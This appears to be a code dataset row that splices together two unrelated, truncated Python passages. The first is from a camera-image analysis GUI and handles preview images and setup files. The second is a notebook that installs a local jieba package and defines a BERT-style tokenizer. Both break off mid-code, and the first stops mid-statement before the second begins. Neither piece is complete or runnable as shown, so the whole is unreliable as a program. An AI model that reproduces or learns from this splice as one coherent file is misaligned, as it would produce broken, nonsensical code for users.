input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
= (int(self.SensVariable.get()*25*self.UnitSize*(self.PictureImage.size[0]/float(self.PictureImage.size[1]))),self.SensVariable.get()*25*self.UnitSize)
self.PictureRatio = (self.SensVariable.get()*25*self.UnitSize)/float(self.PictureImage.size[1])
self.PictureImage = self.PictureImage.resize(self.PictureSize,Image.ANTIALIAS)
self.PicturePhoto = ImageTk.PhotoImage(self.PictureImage)
self.PictureCanvas.delete("all")
self.PictureCanvas.create_image(0,0,image=self.PicturePhoto,anchor="nw")
if self.ActiveMenu.get() == "Polygonic Masking" or "Choose Picture " == self.ActiveMenu.get():
coords = self.setup[self.AnalysisNoVariable.get()-1]['polygonicmask']
if isinstance(coords,dict):
coordss = []
for k in range(len(coords)):
coordss.append(coords[str(k)])
coords = coordss
if not isinstance(coords[0],list):
coords_ = [coords[:]]
else:
coords_ = coords[:]
for coords in coords_:
tmp = coords[:]
for i,t in enumerate(tmp):
if i % 2 == 0:
tmp[i] = round(t*self.PictureImage.size[0]) #maskdebug
else:
tmp[i] = round(t*self.PictureImage.size[1])
if tmp != [0,0,0,0,0,0,0,0]:
self.PictureCanvas.create_polygon(*(tmp),outline=[self.PolygonColor0.get(),self.PolygonColor1.get()][int(float(self.PolygonNoVariable.get()-1!=coords_.index(coords)))],fill="",width=self.PolygonWidth.get())
else:
try:
self.PictureCanvas.destroy()
if not self.PlotCanvasSwitch.get():
self.geometry(str(self.WindowX)+"x"+str(self.WindowY))
except:
pass
def FetchCurrentImages(self):
    """Download the current image archive and refresh whichever picture menu is open."""
    self.DownloadArchive(camselect=False)
    active = self.ActiveMenu.get()
    if active == "Choose Picture for Preview":
        self.Menu_Main_Camera_Picture()
    if active == "Choose Picture ":
        self.Menu_Main_Masking_Polygonic_Picture()
    self.Message.set("Images fetched.")
def ChangePictureFileName(self,*args):
    # Listbox callback: switch the preview image of the current scenario to
    # the file selected in MenuItem1, then copy it into PreviewsDir.
    fn = self.MenuItem1.get(self.MenuItem1.curselection())
    source_ = self.setup[self.AnalysisNoVariable.get()-1]['source']
    source = sources.getProxySource(self.Message,source_,self.proxylist)
    scenario = self.setup[self.AnalysisNoVariable.get()-1]  # NOTE(review): unused local
    # Timestamp suffix parsed out of the selected file name.
    pfn_ts = '-' + parsers.dTime2fTime(parsers.strptime2(fn,source['filenameformat'])[0])
    # Preview file name encodes the camera identity; temporary sources have no
    # network id, so their name is built from connection details instead.
    if 'temporary' in source and source['temporary']:
        pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
        pfn_prev = [validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']), os.path.splitext(source['filenameformat'])[1]]  # NOTE(review): unused local
    else:
        pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
        pfn_prev = [source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']),os.path.splitext(source['filenameformat'])[1]]  # NOTE(review): unused local
    # Resolve the on-disk location of the selected image.
    if source['protocol'] == 'LOCAL':
        self.PictureFileName.set(os.path.join(source['path'],fn))
    else:
        if 'temporary' in source and source['temporary']:
            self.PictureFileName.set(os.path.join(os.path.join(TmpDir,'tmp_images'),validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']),fn))
        else:
            self.PictureFileName.set(os.path.join(self.imagespath.get(),source['networkid']+'-'+parsers.validateName(source['network']),parsers.validateName(source['name']),fn))
    # Remember the chosen time in the scenario so it survives reloads.
    self.setup[self.AnalysisNoVariable.get()-1].update({'previewimagetime':parsers.strftime2(parsers.strptime2(fn,source['filenameformat'])[0])[0]})
    self.Message.set("Preview image is changed.")
    # Best effort: cache a copy under PreviewsDir; failure only changes the message.
    try:
        shutil.copyfile(self.PictureFileName.get(),os.path.join(PreviewsDir,pfn))
        self.Message.set('Preview image file is updated camera: '+source['network'] + ' - ' + source['name'])
    except:
        self.Message.set('Preview image file could not be updated for camera: '+source['network'] + ' - ' + source['name'] + '.')
    self.UpdatePictures()
def UpdatePreviewPictureFilesAll(self):
    """Check/download preview images for every camera source, after one confirmation."""
    proceed = tkMessageBox.askyesno('Preview images','Preview images will be checked and downloaded. This process can take a long time depending on the number of cameras and networks. If needed, passwords and usernames will also be asked.\nDo you want to proceed?')
    if not proceed:
        return
    for src in self.sourcelist:
        self.UpdatePreviewPictureFiles(src,[],noconfirm=True)
def UpdatePreviewPictureFiles(self,source,scenario,noconfirm=False):
    # Ensure a preview image for this camera exists in PreviewsDir, fetching
    # one from the image archive if missing. Returns the (possibly modified)
    # (source, scenario) pair.
    self.Message.set('Checking preview image for '+source['name']+'...')
    # Timestamp suffix for the preview file name: the scenario's setting wins
    # over the CNIF (source) setting.
    pfn_ts = ''
    if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
        pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
    else:
        if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
            pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
    # Temporary sources have no network id, so their file name is built from
    # connection details instead.
    if 'temporary' in source and source['temporary']:
        pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
    else:
        pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
    if pfn in os.listdir(PreviewsDir):
        # Preview already cached; nothing to do.
        return (source,scenario)
    else:
        if noconfirm or not sysargv['prompt'] or tkMessageBox.askyesno('Missing preview image','Preview image is missing for '+source['network']+' '+source['name']+'. Do you want to fetch one?'):
            self.Message.set('Updating preview image for camera: '+source['network'] + ' - ' + source['name'])
            img = []
            if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
                self.Message.set('Looking for the image for the ' + source_metadata_names['previewimagetime'] + ' provided by the setup file....' )
                # timec holds [start date, end date, start time, end time];
                # start == end so exactly the configured instant is searched.
                timec = [0,0,0,0]
                timec[0] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
                timec[1] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
                timec[2] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
                timec[3] = parsers.strftime2(parsers.strptime2(scenario['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
                img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), timec + ['Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
                if len(img) == 0:
                    # Configured time has no image: drop it so later runs use the fallbacks.
                    del scenario['previewimagetime']
                    self.Message.set('Can not find the image for the ' + source_metadata_names['previewimagetime'] + ' provided by the setup file. It is removed from the setup.' )
            else:
                if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
                    self.Message.set('Looking for the image for the ' + source_metadata_names['previewimagetime'] + ' provided by CNIF....' )
                    timec = [0,0,0,0]
                    timec[0] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
                    timec[1] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[1]
                    timec[2] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
                    timec[3] = parsers.strftime2(parsers.strptime2(source['previewimagetime'],'%Y-%m-%dT%H:%M:%S')[0],conv="%d.%m.%Y %H:%M")[2]
                    img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), timec + ['Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
                    if len(img) == 0:
                        self.Message.set('Can not find the image for the ' + source_metadata_names['previewimagetime'] + ' provided by CNIF.' )
                else:
                    self.Message.set(source_metadata_names['previewimagetime'] + ' is not supplied in CNIF file or the scenario.')
            # Fallback 1: any image around midday. Fallback 2: any image at all.
            if len(img) == 0:
                self.Message.set('Looking for a suitable image...')
                img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), [0,0,'11:30','12:30','Date and time intervals'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
            if len(img) == 0:
                img, ts = fetchers.fetchImages(self, self.Message, source, self.proxy, self.connection, self.imagespath.get(), [0,0,'00:00','23:59','All'], count=1, online=True, care_tz = self.TimeZoneConversion.get())[:2]
            if len(img) == 0:
                self.Message.set('No suitable file for preview image found for camera: '+source['network'] + ' - ' + source['name'])
                return (source,scenario)
            else:
                # Rebuild the file name with the actual timestamp of the fetched
                # image when a preview time was configured; otherwise strip the
                # stale suffix.
                if ('previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None) or ('previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None):
                    if len(pfn_ts) == 0:
                        pfn = os.path.splitext(pfn)[0] + '-' + parsers.dTime2fTime(ts[0]) + os.path.splitext(pfn)[1]
                    else:
                        pfn = os.path.splitext(pfn)[0][:-len(pfn_ts)] + '-' + parsers.dTime2fTime(ts[0]) + os.path.splitext(pfn)[1]
                else:
                    if len(pfn_ts) == 0:
                        pfn = os.path.splitext(pfn)[0] + os.path.splitext(pfn)[1]
                    else:
                        pfn = os.path.splitext(pfn)[0][:-len(pfn_ts)] + os.path.splitext(pfn)[1]
                # Best-effort copy into the preview cache; failure only changes the message.
                try:
                    shutil.copyfile(img[0],os.path.join(PreviewsDir,pfn))
                    self.Message.set('Preview image downloaded/updated for camera: '+source['network'] + ' - ' + source['name'])
                    self.PictureFileName.set(os.path.join(PreviewsDir,pfn))
                except:
                    self.Message.set('Preview image could not be downloaded/updated for camera: '+source['network'] + ' - ' + source['name'])
                return (source,scenario)
        # NOTE(review): reached only when the user declines the fetch; the method
        # then implicitly returns None, while callers unpack a (source, scenario)
        # tuple — confirm those callers always confirm or pass noconfirm=True.
        self.Message.set('Checking complete.')
def UpdatePictureFileName(self):
    # Point PictureFileName at the cached preview image of the current
    # scenario, falling back to the bundled blank preview when none exists.
    source_ = self.setup[self.AnalysisNoVariable.get()-1]['source']
    source = sources.getProxySource(self.Message,source_,self.proxylist)
    scenario = self.setup[self.AnalysisNoVariable.get()-1]
    # Timestamp suffix: the scenario's 'previewimagetime' wins over CNIF's.
    pfn_ts = ''
    if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
        pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
    else:
        if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
            pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
    # Temporary sources have no network id; name built from connection details.
    if 'temporary' in source and source['temporary']:
        pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
    else:
        pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
    if pfn in os.listdir(PreviewsDir):
        self.PictureFileName.set(os.path.join(PreviewsDir,pfn))
    else:
        self.PictureFileName.set(os.path.join(ResourcesDir,'preview_blank.jpg'))
def setupFileLoad(self):
    # Load a setup file, either from the command line argument or via a
    # file-open dialog, then rebuild source lists and the main menu.
    if sysargv['setupfile'] is not None:
        ans = sysargv['setupfile']
    else:
        self.file_opt = options = {}
        options['defaultextension'] = '.cfg'
        options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
        options['title'] = 'Choose setup file to load...'
        ans = tkFileDialog.askopenfilename(**self.file_opt)
    # Dialog returns '' / '.' / () on cancellation depending on platform.
    if ans != '' and ans != '.' and ans != ():
        ans = os.path.normpath(ans)
        setup = self.setupFileRead(ans)
        if sysargv['gui']:
            self.Menu_Main()
        self.setup = setup
        # Reconcile the loaded setup with the known camera networks/sources.
        (self.networklist,self.sourcelist, self.setup) = sources.fixSourcesBySetup(self.Message,self.networklist,self.sourcelist, self.setup)
        self.setupFileVariable.set(ans)
        self.Message.set("Setup file is loaded.")
        if not sysargv['gui']:
            # Headless mode: no menu refresh needed.
            return False
        self.AnalysisNoVariable.set(1)
        self.Menu_Main()
    else:
        self.Message.set("Loading cancelled.")
def setupFileRead(self,fname):
    # Read a setup file and migrate/validate it: drop unsupported analyses,
    # fill missing analysis parameters with defaults, and upgrade legacy
    # field formats (polygon dicts, temporal modes, timestamps, thresholds).
    setup = parsers.readSetup(fname,self.sourcelist,self.Message)
    #check analyses are valid:
    warning = "Analyses "
    showwarning = False
    for s,scenario in enumerate(setup):
        # Normalize a single analysis entry into a list.
        if not isinstance(scenario['analyses'],list):
            scenario.update({'analyses':[scenario['analyses']]})
        discard = []
        for analysis in scenario['analyses']:
            if analysis == '':
                discard.append(analysis)
            else:
                if scenario[analysis]['id'] not in calcids:
                    # Unknown calculation id: analysis (or its plugin) is gone.
                    discard.append(analysis)
                    showwarning = True
                    self.Message.set("Analysis "+ scenario[analysis]['name']+" in selected setup file is not supported anymore or plugin file is not detected if it is a plugin. The analysis is discarded.")
                    warning += analysis + ' in selected setup file are not supported anymore or plugin file(s) are not detected if it is a plugin. The analyses are discarded. '
                else:
                    # Backfill parameters added after the setup file was written.
                    for p,param in enumerate(paramnames[calcids.index(scenario[analysis]['id'])]):
                        if param not in scenario[analysis]:
                            scenario[analysis].update({param:paramdefs[calcids.index(scenario[analysis]['id'])][p]})
                            self.Message.set("Analysis "+ scenario[analysis]['name']+" in selected setup file does not include the parameter "+ param+ ". It is set to default ("+str(paramdefs[calcids.index(scenario[analysis]['id'])][p])+").")
        # Keep only the analyses that survived validation.
        analyses = []
        for analysis in scenario['analyses']:
            if analysis not in discard:
                analyses.append(analysis)
        scenario.update({'analyses':analyses})
        for analysis in discard:
            if analysis != '':
                del scenario[analysis]
        if len(discard)>0:
            if len(analyses) > 0:
                # Re-number remaining 'analysis-N' keys to close the gaps.
                # NOTE(review): looks up scenario['analysis-'+str(d+1)], which can
                # raise KeyError if that slot was itself discarded — confirm.
                for i,d in enumerate(discard):
                    d = int(discard[i].replace('analysis-',''))
                    scenario.update({'analysis-'+str(d-i):scenario['analysis-'+str(d+1)]})
            else:
                # Nothing left: fall back to the default analysis.
                scenario.update({'analysis-1':deepcopy(scenario_def['analysis-1'])})
                scenario.update({'analyses':['analysis-1']})
                warning += 'It was the only analysis in the scenario, thus the default analysis is added to the scenario.'
            warning += '\n'
        setup[s] = scenario
    if showwarning:
        tkMessageBox.showwarning('Setup problem',warning)
    #fix polygons: legacy dict form {"0": coords, ...} -> list of coords
    for i,scenario in enumerate(setup):
        if isinstance(scenario['polygonicmask'],dict):
            coordict = scenario['polygonicmask']
            coordlist = []
            for j in range(len(coordict)):
                coordlist.append(coordict[str(j)])
            setup[i].update({'polygonicmask':coordlist})
    #fix missing multiplerois
    for i,scenario in enumerate(setup):
        if 'multiplerois' not in scenario:
            setup[i].update({'multiplerois':0})
    #fix temporal selection: older setups lack the 5th (mode) element
    for i,scenario in enumerate(setup):
        if len(scenario['temporal']) < 5:
            setup[i]['temporal'].append(temporal_modes[1])
    #fix timestamps from v0.15.4 and older ('%Y%m%d_%H%M%S' -> ISO with 'T')
    for i,scenario in enumerate(setup):
        for key in ['previewimagetime','lastimagetime','firstimagetime']:
            if key in scenario and scenario[key] is not None:
                if scenario[key] == '':
                    scenario[key] = None
                else:
                    if 'T' not in scenario[key]:
                        setup[i][key] = parsers.strftime2(parsers.strptime2(scenario[key],'%Y%m%d_%H%M%S')[0])[0]
            if key in scenario['source'] and scenario['source'][key] is not None:
                if scenario['source'][key] == '':
                    scenario['source'][key] = None
                else:
                    if 'T' not in scenario['source'][key]:
                        setup[i]['source'][key] = parsers.strftime2(parsers.strptime2(scenario['source'][key],'%Y%m%d_%H%M%S')[0])[0]
        # Normalize timezone '+HHMM' -> '+HH:MM'.
        if 'timezone' in scenario['source'] and scenario['source']['timezone'] is not None:
            if ':' not in scenario['source']['timezone']:
                setup[i]['source']['timezone'] = scenario['source']['timezone'][:-2] + ':' + scenario['source']['timezone'][-2:]
    #fix Thresholds: pad older, shorter threshold vectors to the current length
    for i,scenario in enumerate(setup):
        if len(scenario['thresholds']) == 18:
            setup[i]['thresholds'] = scenario['thresholds'] + [0.0,1.0,0.0,1.0,0.0,1.0,0.0,1.0]
        if len(scenario['thresholds']) == 8:
            setup[i]['thresholds'] = scenario['thresholds'] + [0.0,255.0,0.0,255.0,0.0,255.0,0.0,1.0,0.0,255.0,0.0,1.0,0.0,1.0,0.0,1.0,0.0,1.0]
    return setup
def setupFileSave(self):
    """Save the setup to its current file; delegate to Save As for untitled setups."""
    self.UpdateSetup()
    target = self.setupFileVariable.get()
    if target == "Untitled.cfg":
        self.setupFileSaveas()
        return
    parsers.writeTSVx(target,self.setupToWrite(self.setup))
    self.Message.set("Setup file saved as " + os.path.split(target)[1])
def setupFileSaveas(self):
    """Ask for a file name and save the current setup there."""
    self.UpdateSetup()
    self.file_opt = options = {}
    options['defaultextension'] = '.cfg'
    options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
    options['title'] = 'Set setup file to save...'
    ans = tkFileDialog.asksaveasfilename(**self.file_opt)
    # Dialog returns '' / '.' / () on cancellation depending on platform.
    if ans in ('', '.', ()):
        self.Message.set("Saving cancelled.")
        return
    self.setupFileVariable.set(os.path.normpath(ans))
    parsers.writeTSVx(self.setupFileVariable.get(),self.setupToWrite(self.setup))
    self.Message.set("Setup file saved as " + os.path.split(self.setupFileVariable.get())[1])
def setupFileSaveasModified(self):
    """Save a source-modified copy of the setup without touching the current file."""
    self.UpdateSetup()
    self.file_opt = options = {}
    options['defaultextension'] = '.cfg'
    options['filetypes'] = [ ('FMIPROT setup files', '.cfg'),('FMIPROT configuration files', '.cfg'),('all files', '.*')]
    options['title'] = 'Set setup file to save...'
    ans = tkFileDialog.asksaveasfilename(**self.file_opt)
    # Dialog returns '' / '.' / () on cancellation depending on platform.
    if ans in ('', '.', ()):
        self.Message.set("Saving cancelled.")
        return
    ans = os.path.normpath(ans)
    # Work on a deep copy so the in-memory setup keeps its original sources.
    modified = self.modifySourcesInSetup(deepcopy(self.setup))
    parsers.writeTSVx(ans,self.setupToWrite(modified))
    self.Message.set("Modified copy of setup file saved as " + os.path.split(ans)[1])
def setupToWrite(self,setup):
    """Return a deep-copied, file-serializable version of *setup*.

    Scenarios flagged temporary are dropped; a literal ``temporary: False``
    flag is stripped. Polygonic masks stored as a list of polygons are
    converted to the on-disk dict form ``{"0": coords, "1": coords, ...}``.
    The input list is never mutated.
    """
    cleaned = []
    for scenario in deepcopy(setup):
        if 'temporary' in scenario:
            # Identity check on purpose: anything but the exact False object
            # (True, 1, 0, ...) marks the scenario as transient and unsaved.
            if scenario['temporary'] is not False:
                continue
            del scenario['temporary']
        cleaned.append(scenario)
    for idx, scenario in enumerate(cleaned):
        if isinstance(scenario['polygonicmask'][0], list):
            as_dict = {str(j): coord for j, coord in enumerate(scenario['polygonicmask'])}
            cleaned[idx].update({'polygonicmask': as_dict})
    return cleaned
def setupFileClear(self):
    # Reset the application to an empty, untitled setup and rebuild the menu.
    self.setupFileVariable.set("Untitled.cfg")
    self.setup = []
    if not sysargv['gui']:
        # Headless mode: no menu to rebuild.
        return False
    self.AnalysisNoNew()
    self.Menu_Main()
    self.Message.set("Setup is resetted.")
def setupFileReport(self):
    """Ask for an HTML file name and generate the setup report there."""
    self.UpdateSetup()
    self.file_opt = options = {}
    options['defaultextension'] = '.html'
    options['filetypes'] = [ ('HTML', '.html'),('all files', '.*')]
    options['title'] = 'Set file to save the report...'
    ans = tkFileDialog.asksaveasfilename(**self.file_opt)
    # Dialog returns '' / '.' / () on cancellation depending on platform.
    if ans in ('', '.', ()):
        self.Message.set('Report generation cancelled.')
        return
    self.setupFileReportFunc(os.path.normpath(ans))
def setupFileReportFunc(self,ans,s=False):
res_data = False
if isinstance(ans,list):
res_data = ans[1:]
ans = ans[0]
if ans != '' and ans != '.':
setup = deepcopy(self.setup)
maskdir = os.path.splitext(ans)[0]+"_files"
if s is not False:
setup = [deepcopy(self.setup[s])]
for i,scenario in enumerate(setup):
source_ = scenario['source']
source = sources.getProxySource(self.Message,source_,self.proxylist)
(source,scenario) = self.UpdatePreviewPictureFiles(source,scenario)
pfn_ts = ''
if 'previewimagetime' in scenario and scenario['previewimagetime'] != '' and scenario['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(scenario['previewimagetime'])
else:
if 'previewimagetime' in source and source['previewimagetime'] != '' and source['previewimagetime'] is not None:
pfn_ts = '-' + parsers.sTime2fTime(source['previewimagetime'])
if 'temporary' in source and source['temporary']:
pfn = validateName(source['network'])+'-'+source['protocol']+'-'+source['host']+'-'+validateName(source['username'])+'-'+validateName(source['path']) +'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
else:
pfn = source['networkid']+'-'+validateName(source['network'])+'-'+validateName(source['name']) + pfn_ts + os.path.splitext(source['filenameformat'])[1]
if not os.path.exists(maskdir):
os.makedirs(maskdir)
maskfiles = []
maskfilet = []
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_0.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_1.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_2.jpg"))
maskfilet.append(os.path.join(maskdir,"Scenario_"+str(i+1)+"_Mask_Preview_3.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_0.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_1.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_2.jpg"))
maskfiles.append(os.path.join(TmpDir,"Scenario_"+str(i+1)+"_Mask_Preview_3.jpg"))
aoic = deepcopy(scenario['polygonicmask'])
if isinstance(aoic, dict):
aoi = []
for k in aoic:
aoi.append(aoic[k])
aoic = aoi
if not | |
!pip install ../kernel/my_jieba.zip
!unzip ../kernel/1568302514.zip
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import re
"""Tokenization classes."""
import collections
import unicodedata
import six
import tensorflow as tf
def convert_to_unicode(text):
    """Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
    if six.PY3:
        if isinstance(text, str):
            return text
        if isinstance(text, bytes):
            return text.decode("utf-8", "ignore")
        raise ValueError("Unsupported string type: %s" % (type(text)))
    if six.PY2:
        # On Python 2, `str` is bytes and `unicode` is text.
        if isinstance(text, str):
            return text.decode("utf-8", "ignore")
        if isinstance(text, unicode):
            return text
        raise ValueError("Unsupported string type: %s" % (type(text)))
    raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
    """Returns text encoded in a way suitable for print or `tf.logging`."""
    # These functions want `str` for both Python2 and Python3, but in one case
    # it's a Unicode string and in the other it's a byte string.
    if six.PY3:
        if isinstance(text, str):
            return text
        if isinstance(text, bytes):
            return text.decode("utf-8", "ignore")
        raise ValueError("Unsupported string type: %s" % (type(text)))
    if six.PY2:
        if isinstance(text, str):
            return text
        if isinstance(text, unicode):
            return text.encode("utf-8")
        raise ValueError("Unsupported string type: %s" % (type(text)))
    raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
    """Loads a vocabulary file into a dictionary (token -> line index)."""
    vocab = collections.OrderedDict()
    with tf.gfile.GFile(vocab_file, "r") as reader:
        index = 0
        while True:
            line = convert_to_unicode(reader.readline())
            if not line:
                # readline() returns '' only at EOF.
                break
            vocab[line.strip()] = index
            index += 1
    return vocab
def convert_by_vocab(vocab, items):
    """Converts a sequence of [tokens|ids] using the vocab; OOV items map to [UNK]."""
    output = []
    for item in items:
        lookup = item
        if item.startswith("##"):
            tail = item.split("##")[-1]
            # A "##"-prefixed single Chinese character that exists in the vocab
            # is looked up without the prefix.
            if tail in vocab and len(tail) == 1 and _is_chinese_char(ord(tail)):
                lookup = tail
        output.append(vocab.get(lookup, vocab["[UNK]"]))
    return output
def convert_tokens_to_ids(vocab, tokens):
    # Thin wrapper: map wordpiece tokens to ids through the shared vocab lookup.
    return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
    """Map ids back to tokens via the inverse vocab (KeyError on unknown ids)."""
    return [inv_vocab[item] for item in ids]
def whitespace_tokenize(text):
    """Runs basic whitespace cleaning and splitting on a piece of text."""
    stripped = text.strip()
    return stripped.split() if stripped else []
# Reserved BERT "[unusedN]" placeholder tokens (N = 1..99), kept intact by tokenization.
unused_token = {'[unused{}]'.format(i): i for i in range(1, 100)}
class FullTokenizer(object):
    """End-to-end tokenization: basic splitting followed by wordpiece lookup."""

    def __init__(self, vocab_file, do_lower_case=True, do_whole_word_mask=False):
        self.vocab = load_vocab(vocab_file)
        self.inv_vocab = {token_id: token for token, token_id in self.vocab.items()}
        self.basic_tokenizer = BasicTokenizer(
            do_lower_case=do_lower_case, do_whole_word_mask=do_whole_word_mask)
        self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)

    def tokenize(self, text):
        """Split text into wordpieces; reserved [unusedN] tokens pass through whole."""
        pieces = []
        for word in self.basic_tokenizer.tokenize(text):
            if word in unused_token:
                pieces.append(word)
            else:
                pieces.extend(self.wordpiece_tokenizer.tokenize(word))
        return pieces

    def convert_tokens_to_ids(self, tokens, max_length=None):
        return convert_tokens_to_ids(self.vocab, tokens)

    def convert_ids_to_tokens(self, ids):
        return convert_ids_to_tokens(self.inv_vocab, ids)

    def covert_tokens_to_char_ids(self, tokens, max_length=None, char_len=5):
        # Not implemented. ("covert" typo kept for call-site compatibility.)
        pass

    def padding(self, token_id_lst, max_length, zero_padding=0):
        """Right-pad a list of ids with `zero_padding` up to `max_length`."""
        return token_id_lst + [zero_padding] * (max_length - len(token_id_lst))
class BasicTokenizer(object):
    """Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
    def __init__(self, do_lower_case=True, do_whole_word_mask=False):
        """Constructs a BasicTokenizer.
        Args:
          do_lower_case: Whether to lower case the input.
          do_whole_word_mask: If True, CJK characters are not split into
            individual tokens, so whole words stay intact for masking.
        """
        self.do_lower_case = do_lower_case
        self.do_whole_word_mask = do_whole_word_mask
    def tokenize(self, text):
        """Tokenizes a piece of text."""
        text = convert_to_unicode(text)
        text = self._clean_text(text)
        # This was added on November 1st, 2018 for the multilingual and Chinese
        # models. This is also applied to the English models now, but it doesn't
        # matter since the English models were not trained on any Chinese data
        # and generally don't have any Chinese data in them (there are Chinese
        # characters in the vocabulary because Wikipedia does have some Chinese
        # words in the English Wikipedia.).
        if not self.do_whole_word_mask:
            text = self._tokenize_chinese_chars(text)
        orig_tokens = whitespace_tokenize(text)
        split_tokens = []
        for token in orig_tokens:
            if self.do_lower_case:
                token = token.lower()
                token = self._run_strip_accents(token)
            # Reserved [unusedN] placeholders are emitted verbatim, unsplit.
            if token in unused_token:
                split_tokens.append(token)
                continue
            split_tokens.extend(self._run_split_on_punc(token))
        output_tokens = whitespace_tokenize(" ".join(split_tokens))
        return output_tokens
    def _run_strip_accents(self, text):
        """Strips accents from a piece of text."""
        text = unicodedata.normalize("NFD", text)
        output = []
        for char in text:
            cat = unicodedata.category(char)
            if cat == "Mn":
                # Drop combining marks left over from NFD decomposition.
                continue
            output.append(char)
        return "".join(output)
    def _run_split_on_punc(self, text):
        """Splits punctuation on a piece of text."""
        chars = list(text)
        i = 0
        start_new_word = True
        output = []  # list of char lists; each inner list becomes one token
        while i < len(chars):
            char = chars[i]
            if _is_punctuation(char):
                # Every punctuation character forms its own single-char token.
                output.append([char])
                start_new_word = True
            else:
                if start_new_word:
                    output.append([])
                start_new_word = False
                output[-1].append(char)
            i += 1
        return ["".join(x) for x in output]
    def _tokenize_chinese_chars(self, text):
        """Adds whitespace around any CJK character."""
        output = []
        for char in text:
            cp = ord(char)
            if self._is_chinese_char(cp):
                output.append(" ")
                output.append(char)
                output.append(" ")
            else:
                output.append(char)
        return "".join(output)
    def _is_chinese_char(self, cp):
        """Checks whether CP is the codepoint of a CJK character."""
        # This defines a "chinese character" as anything in the CJK Unicode block:
        # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
        #
        # Note that the CJK Unicode block is NOT all Japanese and Korean characters,
        # despite its name. The modern Korean Hangul alphabet is a different block,
        # as is Japanese Hiragana and Katakana. Those alphabets are used to write
        # space-separated words, so they are not treated specially and handled
        # like the all of the other languages.
